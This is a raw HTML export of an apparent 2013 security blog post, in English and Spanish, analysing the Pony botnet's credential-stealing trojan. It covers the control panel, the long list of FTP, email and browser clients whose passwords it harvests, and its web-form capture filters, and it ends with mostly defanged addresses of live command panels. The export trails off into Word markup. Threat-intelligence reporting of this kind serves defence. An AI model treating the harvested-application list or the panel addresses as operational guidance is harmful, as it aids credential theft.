Staff-FTP , AceFTP , Global Downloader , FreshFTP , BlazeFTP , NETFile , GoFTP
, 3D-FTP , Easy FTP , Xftp , FTP Now , Robo-FTP , LinasFTP , Cyberduck , Putty
, Notepad++ , CoffeeCup Visual Site Designer , FTPShell , FTPInfo , NexusFile ,
FastStone Browser , CoolNovo , WinZip , Yandex.Internet , MyFTP , sherrod FTP ,
NovaFTP , Windows Mail , Windows Live Mail , Becky! , Pocomail , IncrediMail ,
The Bat! , Outlook , Thunderbird , FastTrack .</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Screen from menu management of the FTP grabber :</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s1600/pony-ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s320/pony-ftp.jpg" width="320" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Also captures all kind of e-mails and their passwords,
stored certificates and <span style="mso-spacerun: yes;"> </span>RDP passwords</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s1600/pony-other.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s400/pony-other.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Control panel allows capturing all types of passwords
for loging web applications on HTTP and HTTPS. It has a very powerful filter to
configure Captures, selecting or excluding Internet domains to start capturing
data when infected users access in these pages, and selects by text strings,
domains , countries , dates, etc.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s1600/pony-http.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="383" src="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s400/pony-http.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The statistical panel shows confidential data captured
from Web browsing of infected users.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s1600/pony-reports.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s400/pony-reports.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">compromised Users by the Trojan Pony are ordered by
their IP, the information gathered can be selected for each user by selecting
the desired IP profile:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s1600/pony-reports2-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s400/pony-reports2-B.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">It is very interesting to see in the statistical panel
the variety of data types that can be captured by the Trojan from infected
users</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s1600/pony2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s400/pony2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s1600/pony-statistics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s400/pony-statistics.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s1600/pony-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"> </span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">All captured data is encrypted and stored in a MySQL
database to prevent being stolen if someone gains access to this information:</span>
</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span class="hps"><span lang="EN" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN;">Finally we present</span></span><span lang="EN" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN;"> <span class="hps">part
of</span> <span class="hps"><span style="mso-spacerun: yes;"> </span>file structure</span>
<span class="hps">of</span> the <span class="hps">KIT</span> <span class="hps">PONY
Troyan</span>:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s1600/files-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s400/files-kit.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Also Have been found other malicious addresses
containing Pony panels actives at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://217.195.200.12:8080/ponyb/admin.php</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://195.5.208.204:8080/ponyb/admin.php</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://9jal33ts.com/ponysample/admin.php</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">hXXp://198.27.83.179/popo/</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp:</span><span lang="EN-US" style="mso-ansi-language: EN-US;"> </span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">http://hostohu.net/p0x/admin.php</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://vpro.juplo.com/p/admin.php</span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-72870291473776524382013-01-13T11:09:00.001-08:002013-01-13T12:03:16.458-08:00PONY 1.9 BOTNET<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Desde hace
unos pocos meses se ha detectado en el escenario del cibercrimen una nueva
clase de Bonet Malware denominada PONY y que se identifica su panel por el logo
de este animal que aparece en el famoso juego para Facebook “Farmville”</span></span><br />
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" /></a></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">La pantalla
de login al panel de este nuevo botnet Pony es la siguiente:</span></span><br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s1600/pony-login-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s400/pony-login-B.jpg" width="400" /></a></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Una vez que
se ha accedido a este Panel de Control aparece el menú con todas las opciones
disponibles observándose que ha sido diseñado para capturar todo tipo de credenciales
de acceso de las aplicaciones de los usuarios infectados así como de los sitios
de Internet a los que accede. </span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Se trata de un potente Malware del tipo Spy –
Keylogger con funcionalidades muy peligrosas.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s1600/pony-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s640/pony-B.jpg" width="640" /></a></div>
<br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">El troyano
Pony está configurado para capturar toda clase de información confidencial y
datos de acceso para las siguientes aplicaciones:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Contraseñas
de acceso para servidores FTP y SSH. El troyano es capaz de reconocer casi todas
las aplicaciones FTP, SSH existentes en el mercado y extraer sus credenciales:</span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">System
Info , FAR Manager , Total Commander , WS_FTP , CuteFTP , FlashFXP , FileZilla
, FTP commander , BulletProof FTP , SmartFTP , TurboFTP , FFFTP , CoffeeCup FTP
/ Sitemapper , CoreFTP , FTP Explorer , Frigate3 FTP , SecureFX , UltraFXP ,
FTPRush , WebSitePublisher , BitKinex , ExpanDrive , ClassicFTP , Fling , SoftX
, Directory Opus , FreeFTP / DirectFTP , LeapFTP , WinSCP , 32bit FTP ,
NetDrive , WebDrive , FTP Control , Opera , WiseFTP , FTP Voyager , Firefox ,
FireFTP , SeaMonkey , Flock , Mozilla , LeechFTP , Odin Secure FTP Expert ,
WinFTP , FTP Surfer , FTPGetter , ALFTP , Internet Explorer , Dreamweaver ,
DeluxeFTP , Google Chrome , Chromium / SRWare Iron , ChromePlus , Bromium
(Yandex Chrome) , Nichrome , Comodo Dragon , RockMelt , K-Meleon , Epic ,
Staff-FTP , AceFTP , Global Downloader , FreshFTP , BlazeFTP , NETFile , GoFTP
, 3D-FTP , Easy FTP , Xftp , FTP Now , Robo-FTP , LinasFTP , Cyberduck , Putty
, Notepad++ , CoffeeCup Visual Site Designer , FTPShell , FTPInfo , NexusFile ,
FastStone Browser , CoolNovo , WinZip , Yandex.Internet , MyFTP , sherrod FTP ,
NovaFTP , Windows Mail , Windows Live Mail , Becky! , Pocomail , IncrediMail ,
The Bat! , Outlook , Thunderbird , FastTrack .</span></span></div>
<div class="MsoNormal">
<br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">La pantalla
del menú de gestión del capturador FTP:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s1600/pony-ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s1600/pony-ftp.jpg" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">También captura
cualquier tipo de direcciones de e-mails , así como sus contraseñas de acceso ,
certificados que tenga almacenados el usuario , además de contraseñas de acceso
RDP</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s1600/pony-other.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s640/pony-other.jpg" width="640" /></a></div>
</div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">El panel
permite la captura de todo tipo de contraseñas de acceso a aplicaciones web
bajo HTTP y HTTPS. Dispone de un filtro muy potente para configurar las
capturas , seleccionando o excluyendo los dominios de Internet a los que el
usuario infectado acceda para empezar a capturar datos cuando se encuentre en
dichas páginas , así como cadenas de texto de captura , países de los dominios víctimas
, fechas , etc.</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s1600/pony-http.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s320/pony-http.jpg" width="320" /></a></div>
<span style="font-family: Arial;"></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">El panel de
seguimiento de los datos confidenciales capturados de la navegación Web de los
usuarios infectados.</span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s1600/pony-reports.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s400/pony-reports.jpg" width="400" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br />
<span style="font-family: Arial;"></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Los usuarios
comprometidos por el troyano Pony están ordenados por su IP , pudiéndose seleccionar
la información recopilada para cada usuario seleccionando el perfil de la IP
deseada:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s1600/pony-reports2-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s400/pony-reports2-B.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Es muy
interesante observar en el panel estadístico la cantidad de información que
puede capturar de los usuarios infectados por el troyano:</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s1600/pony2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s400/pony2.jpg" width="400" /></a></div>
</div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s1600/pony-statistics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s400/pony-statistics.jpg" width="400" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Todos los
datos capturados son cifrados y almacenados en una base de datos en MySQL para
evitar que sean robados si alguien logra acceder acceder a dicha información:</span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Finalmente se
presenta parte de la estructura de ficheros del KIT PONY:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s1600/files-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s400/files-kit.jpg" width="400" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Se han
localizado otras direcciones maliciosas conteniendo paneles Pony activos en:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">hXXp://217.195.200.12:8080/ponyb/admin.php</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">hXXp://195.5.208.204:8080/ponyb/admin.php</span></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">hXXp://9jal33ts.com/ponysample/admin.php</span></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">hxxp://198.27.83.179/popo/</span></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-3622541626811802722013-01-07T08:59:00.001-08:002013-01-07T09:00:59.084-08:00Trojan Multi Locker Version 3 - "Trojan police" <!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:HyphenationZone>21</w:HyphenationZone>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>ES</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
